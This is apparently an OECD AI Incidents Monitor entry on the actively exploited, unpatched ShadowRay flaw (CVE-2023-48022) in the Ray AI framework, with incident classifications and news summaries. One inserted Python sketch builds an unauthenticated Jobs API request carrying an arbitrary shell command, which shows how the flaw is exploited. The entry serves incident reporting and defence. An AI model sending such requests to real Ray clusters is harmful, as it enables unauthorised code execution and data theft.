Critical Unpatched Ray AI Framework Vulnerability Exploited in Widespread Attacks

The information displayed in the AIM should not be reported as representing the official views of the OECD or of its member countries.

A critical vulnerability (CVE-2023-48022) in the Ray AI framework has been actively exploited for at least seven months, allowing attackers to access sensitive data, hijack compute resources, and execute arbitrary code at thousands of companies. The vendor disputes that the flaw is a vulnerability, and it remains unpatched, leading to significant breaches and misuse of AI workloads.[AI generated]

Why's our monitor labelling this an incident or hazard?

The Ray framework is an AI-related system used for scaling AI and Python workloads. The exploitation of its vulnerabilities by hackers has directly led to breaches and theft of sensitive data, including AI models and credentials, which is a clear harm to property and potentially to communities dependent on these systems. The active exploitation and resulting damage meet the criteria for an AI Incident, as the AI system's malfunction and security flaws have directly caused harm.[AI generated]
AI principles
Accountability, Robustness & digital security, Privacy & data governance, Safety, Respect of human rights

Industries
IT infrastructure and hosting, Digital security

Affected stakeholders
Business

Harm types
Economic/Property, Reputational, Human or fundamental rights

Severity
AI incident

Business function:
Research and development

AI system task:
Other


Articles about this incident or hazard

Ray framework flaw exploited for hackers to breach servers

2024-03-27
TechRadar
Why's our monitor labelling this an incident or hazard?
The Ray framework is an AI-related system used for scaling AI and Python workloads. The exploitation of its vulnerabilities by hackers has directly led to breaches and theft of sensitive data, including AI models and credentials, which is a clear harm to property and potentially to communities dependent on these systems. The active exploitation and resulting damage meet the criteria for an AI Incident, as the AI system's malfunction and security flaws have directly caused harm.

Hackers Breached Hundreds Of Companies' AI Servers, Researchers Say

2024-03-26
Forbes
Why's our monitor labelling this an incident or hazard?
The event involves an AI system (Ray) used to run AI workloads, which was exploited due to insecure configurations allowing remote code execution without authentication. This exploitation led to direct harm: unauthorized use of computational resources (cryptocurrency mining), theft of sensitive tokens including those for payment services, and long-term compromise of AI infrastructure. The harm includes disruption of AI operations, potential financial theft, and violation of security and privacy rights. The AI system's role is pivotal, as the vulnerability is inherent in the AI infrastructure software and its deployment. Hence, this is an AI Incident rather than a hazard or complementary information.

Unpatched flaw in Anyscale's Ray AI framework under attack

2024-03-27
TechTarget
Why's our monitor labelling this an incident or hazard?
The event involves an AI system (Ray AI framework) with a critical vulnerability that is actively exploited, leading to unauthorized remote code execution and data breaches. This exploitation has caused harm to property and organizational assets, fulfilling the criteria for an AI Incident. The involvement of the AI system's development and use (specifically, the unpatched flaw in its Jobs API) is central to the harm. Although the vendor disputes the vulnerability, independent researchers confirm active exploitation and harm, which is sufficient to classify this as an AI Incident rather than a hazard or complementary information.

Thousands of servers hacked in ongoing attack targeting Ray AI framework

2024-03-27
Ars Technica
Why's our monitor labelling this an incident or hazard?
The event involves a known AI system (Ray framework) used for AI workloads. The attackers exploited a vulnerability in this AI system's Jobs API to gain unauthorized access, tamper with AI models, and steal credentials. These actions have directly led to harm including corruption of AI models (harm to property and AI integrity), unauthorized access to sensitive data (violation of rights and security), and installation of malicious software. The harm is realized and ongoing, not merely potential. Hence, it meets the criteria for an AI Incident as the AI system's use and malfunction (vulnerability exploitation) directly caused significant harm.

'ShadowRay' vulnerability on Ray framework exposes thousands of AI workloads, compute power and data

2024-03-27
VentureBeat
Why's our monitor labelling this an incident or hazard?
The Ray framework is an AI system used to run and scale AI workloads, including large language models. The described vulnerability directly results from a lack of authorization in the Ray Jobs API, allowing attackers to execute arbitrary code and access sensitive data. This exploitation has already caused harm by compromising data confidentiality, misusing computing resources, and potentially enabling further malicious activities. Therefore, the event meets the criteria of an AI Incident, as the AI system's malfunction and exploitation have directly led to significant harm to property (computing resources), data confidentiality, and potentially to organizations relying on these AI workloads.
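The root cause described above is that Ray's Jobs API accepts job submissions without any authentication or authorization. A minimal sketch of what such a submission looks like over the REST interface (the target address is a placeholder, and the request is deliberately constructed but never sent; the endpoint path and `entrypoint` field follow Ray's public Jobs API):

```python
import json
from urllib.request import Request

# Placeholder address for illustration only; a real Ray dashboard
# typically listens on port 8265.
DASHBOARD = "http://example.invalid:8265"

# The Jobs API accepts a job as a plain JSON POST. The payload carries
# an arbitrary shell command ("entrypoint") and no credential, token,
# or signature of any kind -- which is the crux of CVE-2023-48022.
payload = {"entrypoint": "echo any command an attacker chooses"}

req = Request(
    f"{DASHBOARD}/api/jobs/",
    data=json.dumps(payload).encode(),
    headers={"Content-Type": "application/json"},
    method="POST",
)

# Built but intentionally never sent; inspect what would go on the wire.
print(req.get_method(), req.full_url)
print(sorted(req.headers))
```

Because nothing in the request identifies or authenticates the sender, any party who can reach the dashboard port can run code on the cluster, which is why Anyscale's guidance is to deploy Ray only inside a strictly controlled network environment.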

'Thousands' of firms vulnerable to security bug in Ray AI

2024-03-27
TheRegister.com
Why's our monitor labelling this an incident or hazard?
The event involves an AI system (Ray AI framework) whose design decision leads to a critical security vulnerability. The vulnerability is actively exploited, causing direct harm such as data breaches, unauthorized access, and resource misuse. These harms fall under violations of rights and harm to property. Therefore, this qualifies as an AI Incident because the AI system's use and design directly led to realized harms.

Massive hack hits AI servers, exploits Ray framework vulnerability

2024-03-28
ReadWrite
Why's our monitor labelling this an incident or hazard?
The Ray framework is an AI system used for scaling AI workloads. The exploitation of its vulnerability has directly led to unauthorized access, data leaks, and misuse of expensive AI computing resources (GPUs). These outcomes represent realized harms including breach of data confidentiality (a violation of rights) and harm to property (compromised servers and resources). Therefore, this event qualifies as an AI Incident due to the direct harm caused by the AI system's malfunction (security flaw) and its exploitation.

Hundreds of Clusters Attacked Due to Unpatched Flaw in Ray AI Framework

2024-03-28
Security Boulevard
Why's our monitor labelling this an incident or hazard?
The event involves an AI system (the Ray AI framework) whose unpatched security flaw has been actively exploited, resulting in direct harm: unauthorized access to sensitive data, compromised AI production workloads, and misuse of compute resources. The attackers' ability to run arbitrary code and persist in systems indicates a malfunction or misuse of the AI system's deployment environment. The harm includes breaches of data confidentiality, disruption of AI infrastructure, and potential broader impacts on companies relying on these AI workloads. Therefore, this qualifies as an AI Incident because the AI system's use and security flaw have directly led to significant harm.

Flaw in Ray AI framework potentially leaks sensitive data of workloads

2024-03-26
SC Media
Why's our monitor labelling this an incident or hazard?
The article explicitly mentions an AI system (Ray AI framework) being exploited through a critical vulnerability, leading to data leaks and compromise of AI workloads. The harm includes unauthorized data access, potential model tampering, and remote code execution, which are direct harms to property and organizational security. The exploitation is ongoing and has affected thousands of companies, confirming realized harm. Hence, this is an AI Incident as per the definitions provided.